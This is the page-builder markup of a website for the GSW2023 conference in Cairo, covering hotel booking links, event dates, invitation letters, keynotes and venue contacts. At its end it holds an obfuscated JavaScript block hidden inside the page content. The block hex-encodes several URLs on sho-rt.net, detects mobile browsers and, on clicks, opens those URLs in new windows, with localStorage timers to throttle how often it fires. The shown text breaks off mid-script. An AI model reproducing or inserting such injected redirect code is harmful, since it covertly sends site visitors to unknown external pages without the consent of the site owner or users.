bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 